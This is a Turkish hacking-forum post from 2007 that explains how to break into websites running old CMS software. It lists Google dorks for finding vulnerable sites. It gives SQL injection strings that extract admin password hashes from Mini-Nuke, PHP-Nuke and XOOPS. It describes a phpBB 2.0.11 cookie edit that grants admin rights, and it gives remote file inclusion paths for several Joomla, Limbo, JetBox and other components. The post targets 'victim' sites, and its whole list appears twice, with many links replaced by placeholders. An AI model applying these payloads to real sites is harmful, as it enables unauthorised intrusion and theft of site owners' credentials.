x_c€ll@t_x
04-28-2007, 12:20 PM
Hangi site nasil hacklenir....
--------------------------------------------------------------------------------
-MİNİ NUKE V2.3
Mini nuke sitelerle uğraşmak için ilk önce
Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. a giriyoruz ve: 'mini-nuke v2.3' olarak aratıyoruz.
Karşımıza gelen sitelerin sonuna
:/pages.asp?id=3%20union+select+ 0*kul_adi*sifre*0*0+ from+members+where+uye_id=1
Kodunu ekliyoruz ve karşımıza adminin md5 i çıkıyor.
MD5 i kırmak içinde
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
-VİRTUAL WAR V.1.0
ilk önce Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. 'Powered by: Virtual War v1.5.0'
Sonu /war.php olan siteleri seçiyoruz ve
war.php kısmı siliyoruz 'includes/get_header.php?vwar_root=Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. //Sitedeki Linkleri Sadece Üyelerimiz Görebilir..' kodunu ekliyoruz.
Artık admin palenelindeyiz
[Eski bir açık olduğu için sonuç alamayabilirsiniz]
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
---
-PHPBB 2.0.11
işte meşhur phpbb açığı
Bize gereken en önemli program :
Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. [Cooike Editör]
Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken 'BENİ HATIRLA' diyoruz ve siteye giriyoruz.
Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasından
kurban phpbb 2.0.11 sitemizi seçicez.
Sitemizi bulduk 2 kez tıklıyoruz.
Önümüze a%3A2%3A%7Bs%3A11%3A%22autolog inid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3B s%3A1%3A%222%22%3B%7D Gibi Abudik
Kubidik Kodlar Gelicek Üssteki Kodu Slip
a%3A2%3A%7Bs%3A11%3A%22autolog inid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A% 222%22%3B%7D Bu kodu yeryeştiriyoruz
Saveliyoruz.
Artık cooike editör ile işimiz bitti
Sitemizi yeniliyoruz bakıyoruz aaaa adminiz
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
-----
-PHP NUKE SQL INJECTİON
Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. a giriyoruz aranacak kelimeye
'PHP-Nuke Copyright © 2004 by Francisco Burzi' yazıyoruz.
Bulduğumuz sitenin search bölümüne 'p0gg0nsee%') UNION ALL SELECT 1*2*aid*pwd*5*6*7*8*9*10 FROM nuke_authors/*' yazmamız kafi
Search bölümünü bulamadıysanız
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Adminin hashı çıkıyor bunu kırıyoruz dökümanın en üstünde adresleri werdim.
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
------
-COM_REMOSİTORY
Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. ''inurl:"com_remository"
Bulduğumuz sitelere
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..[sitepath]/[joomlapat....php?mosConfig _absolute_path=Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Kodunu ekliyoruz...
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
-----------
-XOOPs MYADS MODULE SQL-INJECTİON VULNERABİLİT
Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. 'inurl:modules/myAds/'
Karşımıza çıkan siteleri şu şekilde değiştiriyoruz.
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..*1/*
Ve önümüze tekrar md5 ler çıkıyor bunları kırmak artık size kalmış...
---------------------------------------------------------------------------
-------------
-TOPLİST HACK PHPBB
GoogLe Arama : inurl:"toplist.php" "powered by phpbb"
Exploit: /toplist.php?f=toplist_top10&ph pbb_root_path=Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
--------------
- PC_COOKBOOK JOOMLA COMPONENT
- pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities
- Author: JaheeMCreW
- Uygulama : pc_cookbook Component
- Version : koyans 0.3
Yapmaniz gereken bir arama moturunda örnek google' da
" allinurl:com_pccookbook " olarak aratmaktir..
Exploit :
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..[target]/[path]/compo...osConfig_absol ute_path=Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
cİGİCİGİ&GPL-X
---------------------------------------------------------------------------
-------------
-SİMPLE BOARD MAMBO
İlk Önce Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Daha Sonra Karşımıza Gelen Sitelere şu expolit i ekliyoruz...
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
CİGİCİGİ&GPL-X
---------------------------------------------------------------------------
-------------
-ShoutBox IncLusion
shoutBox KuruLu SistemLerde Remote FiLe IncLusion Acigi Var...
Code:
/shoutbox/expanded.php?conf=
GoogLe Arama : inurl:"/shoutbox/expanded.php?"
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
--------------
-PHPBAZAR <= 2.1.0 Remote File INCLLUSION
Google Search=inurl:classified.php phpbazar
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
cİGİCİGİ&GPLX
---------------------------------------------------------------------------
---------------
-BoastMachine [bmachine]
yeni gözde blog sistemi olan bmachine'in 2.8 versiyonunda bulunan ufak bi açık :
site adresinden sonra index.php?id=../config.php yazıyoruz ve kaynak bölümüne bakınca adminin
şifresini görüyoruz : )
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
----------------
-Limbo CMS <= 1.04 Remote File Inclusion
GoogLe Arama : inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
Exploit: /classes/adodbt/sql.php?classes_dir=Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
-----------------
-CaLogic Calendars V1.2.2 - Remote File Include
GoogLe Arama : CaLogic Calendars V1.2.2
kullanmak için :
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..[path]/reconfig....1;evil_script]
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..[path]/srxclr.ph...1;evil_script]
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
------------------
-PafileDB Remote File Inclusion [phpBB]
PhpBB SiteLerde PafileDB 'deki aciktan yararLanarak Remote kodlar calistirmaniza yariyor..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. [phpBBpath]/[pafiledbpath] /includes/pafiledb_constants.php?module_ root_path= Sitedeki Linkleri Sadece Üyelerimiz Görebilir..[attacker]
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
-------------------
-JetBox CMS Remote File Include [ RFI ]
Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..
Uretici Firma : Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
JetBox CMS Remote File Include
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..[domain] /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..
GoogLe arama : Powered by Jetbox
---------------------------------------------------------------------------
---------------------
Aratma Kodu : PHP Upload Center v2.0
Shell : activate.php?language=conf&footerpage=Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
--------------------------------------------------------------------------------
-MİNİ NUKE V2.3
Mini nuke sitelerle uğraşmak için ilk önce
Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. a giriyoruz ve: 'mini-nuke v2.3' olarak aratıyoruz.
Karşımıza gelen sitelerin sonuna
:/pages.asp?id=3%20union+select+ 0*kul_adi*sifre*0*0+ from+members+where+uye_id=1
Kodunu ekliyoruz ve karşımıza adminin md5 i çıkıyor.
MD5 i kırmak içinde
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
-VİRTUAL WAR V.1.0
ilk önce Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. 'Powered by: Virtual War v1.5.0'
Sonu /war.php olan siteleri seçiyoruz ve
war.php kısmı siliyoruz 'includes/get_header.php?vwar_root=Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. //Sitedeki Linkleri Sadece Üyelerimiz Görebilir..' kodunu ekliyoruz.
Artık admin palenelindeyiz
[Eski bir açık olduğu için sonuç alamayabilirsiniz]
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
---
-PHPBB 2.0.11
işte meşhur phpbb açığı
Bize gereken en önemli program :
Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. [Cooike Editör]
Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken 'BENİ HATIRLA' diyoruz ve siteye giriyoruz.
Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasından
kurban phpbb 2.0.11 sitemizi seçicez.
Sitemizi bulduk 2 kez tıklıyoruz.
Önümüze a%3A2%3A%7Bs%3A11%3A%22autolog inid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3B s%3A1%3A%222%22%3B%7D Gibi Abudik
Kubidik Kodlar Gelicek Üssteki Kodu Slip
a%3A2%3A%7Bs%3A11%3A%22autolog inid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A% 222%22%3B%7D Bu kodu yeryeştiriyoruz
Saveliyoruz.
Artık cooike editör ile işimiz bitti
Sitemizi yeniliyoruz bakıyoruz aaaa adminiz
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
-----
-PHP NUKE SQL INJECTİON
Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. a giriyoruz aranacak kelimeye
'PHP-Nuke Copyright © 2004 by Francisco Burzi' yazıyoruz.
Bulduğumuz sitenin search bölümüne 'p0gg0nsee%') UNION ALL SELECT 1*2*aid*pwd*5*6*7*8*9*10 FROM nuke_authors/*' yazmamız kafi
Search bölümünü bulamadıysanız
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Adminin hashı çıkıyor bunu kırıyoruz dökümanın en üstünde adresleri werdim.
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
------
-COM_REMOSİTORY
Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. ''inurl:"com_remository"
Bulduğumuz sitelere
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..[sitepath]/[joomlapat....php?mosConfig _absolute_path=Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Kodunu ekliyoruz...
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
-----------
-XOOPs MYADS MODULE SQL-INJECTİON VULNERABİLİT
Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. 'inurl:modules/myAds/'
Karşımıza çıkan siteleri şu şekilde değiştiriyoruz.
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..*1/*
Ve önümüze tekrar md5 ler çıkıyor bunları kırmak artık size kalmış...
---------------------------------------------------------------------------
-------------
-TOPLİST HACK PHPBB
GoogLe Arama : inurl:"toplist.php" "powered by phpbb"
Exploit: /toplist.php?f=toplist_top10&ph pbb_root_path=Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
--------------
- PC_COOKBOOK JOOMLA COMPONENT
- pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities
- Author: JaheeMCreW
- Uygulama : pc_cookbook Component
- Version : koyans 0.3
Yapmaniz gereken bir arama moturunda örnek google' da
" allinurl:com_pccookbook " olarak aratmaktir..
Exploit :
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..[target]/[path]/compo...osConfig_absol ute_path=Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
cİGİCİGİ&GPL-X
---------------------------------------------------------------------------
-------------
-SİMPLE BOARD MAMBO
İlk Önce Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Daha Sonra Karşımıza Gelen Sitelere şu expolit i ekliyoruz...
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
CİGİCİGİ&GPL-X
---------------------------------------------------------------------------
-------------
-ShoutBox IncLusion
shoutBox KuruLu SistemLerde Remote FiLe IncLusion Acigi Var...
Code:
/shoutbox/expanded.php?conf=
GoogLe Arama : inurl:"/shoutbox/expanded.php?"
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
--------------
-PHPBAZAR <= 2.1.0 Remote File INCLLUSION
Google Search=inurl:classified.php phpbazar
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
cİGİCİGİ&GPLX
---------------------------------------------------------------------------
---------------
-BoastMachine [bmachine]
yeni gözde blog sistemi olan bmachine'in 2.8 versiyonunda bulunan ufak bi açık :
site adresinden sonra index.php?id=../config.php yazıyoruz ve kaynak bölümüne bakınca adminin
şifresini görüyoruz : )
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
----------------
-Limbo CMS <= 1.04 Remote File Inclusion
GoogLe Arama : inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
Exploit: /classes/adodbt/sql.php?classes_dir=Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
-----------------
-CaLogic Calendars V1.2.2 - Remote File Include
GoogLe Arama : CaLogic Calendars V1.2.2
kullanmak için :
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..[path]/reconfig....1;evil_script]
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..[path]/srxclr.ph...1;evil_script]
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
------------------
-PafileDB Remote File Inclusion [phpBB]
PhpBB SiteLerde PafileDB 'deki aciktan yararLanarak Remote kodlar calistirmaniza yariyor..
Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. [phpBBpath]/[pafiledbpath] /includes/pafiledb_constants.php?module_ root_path= Sitedeki Linkleri Sadece Üyelerimiz Görebilir..[attacker]
CİGİCİGİ&GPLX
---------------------------------------------------------------------------
-------------------
-JetBox CMS Remote File Include [ RFI ]
Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..
Uretici Firma : Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
JetBox CMS Remote File Include
Sitedeki Linkleri Sadece Üyelerimiz Görebilir..[domain] /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..
GoogLe arama : Powered by Jetbox
---------------------------------------------------------------------------
---------------------
Aratma Kodu : PHP Upload Center v2.0
Shell : activate.php?language=conf&footerpage=Sitedeki Linkleri Sadece Üyelerimiz Görebilir..